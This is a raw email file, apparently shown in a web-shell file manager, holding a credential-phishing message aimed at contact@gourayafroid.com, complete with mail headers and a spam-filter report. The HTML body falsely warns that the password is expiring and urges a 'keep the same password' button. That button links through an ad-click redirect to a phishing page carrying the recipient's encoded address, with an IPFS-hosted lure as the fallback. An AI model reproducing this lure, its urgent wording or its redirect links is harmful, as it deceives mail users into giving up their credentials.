OwlCyberSecurity - MANAGER
Edit File: 1742680685.M811846P217950.premium128.web-hosting.com,S=10882,W=11063:2,
Return-Path: <administrativo@webluz.com.br> Delivered-To: contact+spam@gourayafroid.com Received: from premium128.web-hosting.com by premium128.web-hosting.com with LMTP id mBX7Lm0y32deUwMAAvhI2g (envelope-from <administrativo@webluz.com.br>) for <contact+spam@gourayafroid.com>; Sat, 22 Mar 2025 17:58:05 -0400 Return-path: <administrativo@webluz.com.br> Envelope-to: contact@gourayafroid.com Delivery-date: Sat, 22 Mar 2025 17:58:05 -0400 Received: from mx02.vps001.webluz.com.br ([162.214.126.233]:51401) by premium128.web-hosting.com with esmtps (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.98.1) (envelope-from <administrativo@webluz.com.br>) id 1tw6qv-00000000zDW-1EDz for contact@gourayafroid.com; Sat, 22 Mar 2025 17:58:05 -0400 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=webluz.com.br; s=default; h=Content-Transfer-Encoding:Content-Type: MIME-Version:Message-ID:Date:Subject:To:From:Sender:Reply-To:Cc:Content-ID: Content-Description:Resent-Date:Resent-From:Resent-Sender:Resent-To:Resent-Cc :Resent-Message-ID:In-Reply-To:References:List-Id:List-Help:List-Unsubscribe: List-Subscribe:List-Post:List-Owner:List-Archive; bh=m5OWEUlLiDBxBNgnBMfM8BPmv7HecRQrsELlhCLe3g0=; b=KE7JgBiz0NbhK4uJ39ggYfxrnK z1bzxwjvXcY/owZwf+Q/qd5Bu0ZLDrE+IZWcyG8KMvvTqXwDz52lFeV6mFm0rSxoXxi0jrJ0YY568 8owMzKIlc+wMr/djJricqx1YL9mfN0wIKViOMkBQGnNUkyQCRGbUs1MuoOP1XZ0ZF5rutMy5kz0yx DhwXLClzECR8TOoZTyOJrMkFwuTkE7j2DtXdT+CgwTSFafRKQqVr7fky15my5UESsUqEcazz7t8zX kNtEguFEIYvnH8WSD0363oD3WDbTAF1dPo57i8KCJ4OOW5baEfHr+oQfuvpINOQx1u/g718dQFanA V7MM9yAw==; Received: from [36.140.36.98] (port=49642) by vps-4981252.vps001.webluz.com.br with esmtpsa (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.98.1) (envelope-from <administrativo@webluz.com.br>) id 1tw6qF-000000003vD-0WBA for contact@gourayafroid.com; Sat, 22 Mar 2025 18:57:19 -0300 From: gourayafroid.com <administrativo@webluz.com.br> To: contact@gourayafroid.com Date: 23 Mar 2025 05:57:01 +0800 Message-ID: <20250323055700.E905B67DC414A0AE@webluz.com.br> MIME-Version: 1.0 Content-Type: text/html Content-Transfer-Encoding: quoted-printable X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Primary Hostname - vps-4981252.vps001.webluz.com.br X-AntiAbuse: Original Domain - gourayafroid.com X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12] X-AntiAbuse: Sender Address Domain - webluz.com.br X-Get-Message-Sender-Via: vps-4981252.vps001.webluz.com.br: authenticated_id: administrativo@webluz.com.br X-Authenticated-Sender: vps-4981252.vps001.webluz.com.br: administrativo@webluz.com.br X-Source: X-Source-Args: X-Source-Dir: X-Spam-Status: Yes, score=6.3 X-Spam-Score: 63 X-Spam-Bar: ++++++ X-Spam-Report: Spam detection software, running on the system "premium128.web-hosting.com", has identified this incoming email as possible spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: gourayafroid.com Your contact@gourayafroid.com password is about to expire (Action Required) You must take immediate steps to maintain and avoid restricting access to your gourayafroid.com account keep the same password Content analysis details: (6.3 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- 0.0 URIBL_BLOCKED ADMINISTRATOR NOTICE: The query to URIBL was blocked. See http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block for more information. [URIs: doubleclick.net] 2.5 URIBL_DBL_PHISH Contains a Phishing URL listed in the Spamhaus DBL blocklist [URIs: clinicadeolhosuchoa.com.br] 0.1 URIBL_SBL_A Contains URL's A record listed in the Spamhaus SBL blocklist [URIs: bafybeidoz4j7wj6a45k2ewrocn75mz2k2gddgstu7yq3tagd776q5abgt4.ipfs.dweb.link] 0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [162.214.126.233 listed in sa-trusted.bondedsender.org] -0.0 SPF_PASS SPF: sender matches SPF record 0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [162.214.126.233 listed in bl.score.senderscore.com] 0.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts 0.0 HTML_FONT_LOW_CONTRAST BODY: HTML font color similar or identical to background 0.0 HTML_MESSAGE BODY: HTML included in message -0.1 DKIM_VALID_EF Message has a valid DKIM or DK signature from envelope-from domain -0.1 DKIM_VALID Message has at least one valid DKIM or DK signature -0.1 DKIM_VALID_AU Message has a valid DKIM or DK signature from author's domain 0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid 1.7 URI_DWEBIPFS References Interplanetary File System PtP content via dweb.link, likely phishing 1.2 PDS_FROM_NAME_TO_DOMAIN From:name looks like To:domain 0.9 PDS_FRNOM_TODOM_NAKED_TO Naked to From name equals to Domain 0.0 PDS_FRNOM_TODOM_DBL_URL From Name to domain, double URL 0.0 URI_IPFS References Interplanetary File System PtP content, probable phishing X-Spam-Flag: YES Subject: ***SPAM*** Password Notification - Take Action Now <!DOCTYPE HTML> <html><head><title></title> <meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge"> </head> <body style=3D"margin: 0.4em;"> <p align=3D"center" style=3D"color: rgb(36, 36, 36); text-transform: none; = text-indent: 0px; letter-spacing: normal; font-family: Roboto, sans-serif; = font-size: 15px; font-style: normal; font-weight: 400; margin-top: 0px; mar= gin-bottom: 1rem; word-spacing: 0px; white-space: normal; box-sizing: borde= r-box; orphans: 2; widows: 2; background-color: rgb(255, 255, 255); font-va= riant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-wid= th: 0px; text-decoration-thickness: initial;=20 text-decoration-style: initial; text-decoration-color: initial;"><span styl= e=3D"font-family: Arial; box-sizing: border-box;"><span style=3D"box-sizing= : border-box;"><b><span style=3D"font-size: 23pt; box-sizing: border-box;">= <span style=3D"color: rgb(238, 97, 17); box-sizing: border-box;"><span styl= e=3D"font-size: 25pt; box-sizing: border-box;">gourayafroid.com</span></spa= n></span><br style=3D"box-sizing: border-box;"></b></span></span></p> <p align=3D"center" style=3D"color: rgb(44, 54, 58); text-transform: none; = text-indent: 0px; letter-spacing: normal; font-family: Roboto, sans-serif; = font-size: 14px; font-style: normal; font-weight: 400; margin-top: 0px; mar= gin-bottom: 1rem; word-spacing: 0px; white-space: normal; box-sizing: borde= r-box; orphans: 2; widows: 2; background-color: rgb(255, 255, 255); font-va= riant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-wid= th: 0px; text-decoration-thickness: initial;=20 text-decoration-style: initial; text-decoration-color: initial;"><span styl= e=3D"color: rgb(34, 34, 34); font-family: Arial, Helvetica, sans-serif; fon= t-size: small;">Your contact@gourayafroid.com password is about to expire (= Action Required) You must take immediate steps to maintain and avoid restri= cting access to your gourayafroid.com account</span> <br></p> <p style=3D"padding: 20px 0px; text-align: center; color: rgb(44, 54, 58); = text-transform: none; text-indent: 0px; letter-spacing: normal; font-family= : Roboto, sans-serif; font-size: 14px; font-style: normal; font-weight: 400= ; margin-top: 0px; margin-bottom: 0px; word-spacing: 0px; white-space: norm= al; box-sizing: border-box; orphans: 2; widows: 2; background-color: rgb(25= 5, 255, 255); font-variant-ligatures: normal; font-variant-caps: normal; -w= ebkit-text-stroke-width: 0px;=20 text-decoration-thickness: initial; text-decoration-style: initial; text-de= coration-color: initial;"> <a title=3D"Read Fax" style=3D"background: rgb(227, 96, 9); padding: 11px 2= 4px; color: rgb(255, 255, 255); box-sizing: border-box; text-decoration-lin= e: none;" href=3D"https://ad.doubleclick.net/ddm/trackclk/N4892.5020.477429= 1382421/B23999293.271539123;dc_trk_aid=3D466016770;dc_trk_cid=3D131101292;d= c_lat=3D;dc_rdid=3D;tag_for_child_directed_treatment=3D;tfua=3D?https://cli= nicadeolhosuchoa.com.br/pop/cgi-bin?email=3DY29udGFjdEBnb3VyYXlhZnJvaWQuY29= t" target=3D"_blank" rel=3D"noreferrer"=20 data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://bafybeidoz4j= 7wj6a45k2ewrocn75mz2k2gddgstu7yq3tagd776q5abgt4.ipfs.dweb.link/%23bonn@cybe= r.net.pk&source=3Dgmail&ust=3D1742652683831000&usg=3DAOvVaw1I2k= zfSf2QV6LQwa0wbPk9">keep the same password</a><b> </b><spa= n style=3D"color: rgb(227, 96, 9); font-weight: bold; box-sizing: border-bo= x;"> </span></p> <p style=3D"padding: 20px 0px; text-align: center; color: rgb(44, 54, 58); = text-transform: none; text-indent: 0px; letter-spacing: normal; font-family= : Roboto, sans-serif; font-size: 14px; font-style: normal; font-weight: 400= ; margin-top: 0px; margin-bottom: 0px; word-spacing: 0px; white-space: norm= al; box-sizing: border-box; orphans: 2; widows: 2; background-color: rgb(25= 5, 255, 255); font-variant-ligatures: normal; font-variant-caps: normal; -w= ebkit-text-stroke-width: 0px;=20 text-decoration-thickness: initial; text-decoration-style: initial; text-de= coration-color: initial;"><span style=3D"color: rgb(34, 34, 34); font-famil= y: Arial, Helvetica, sans-serif; font-size: small; box-sizing: border-box;"= >Issues discovered in the claims fulfillment system will no longer be inves= tigated or fixed.© gourayafroid.com</span><span style=3D"color: rgb(34= , 34, 34); font-family: Arial, Helvetica, sans-serif; font-size: small; box= -sizing: border-box;"> </span> <span style=3D"color: rgb(34, 34, 34); font-family: Arial, Helvetica, sans-= serif; font-size: small; box-sizing: border-box;">2025</span></p></body></h= tml>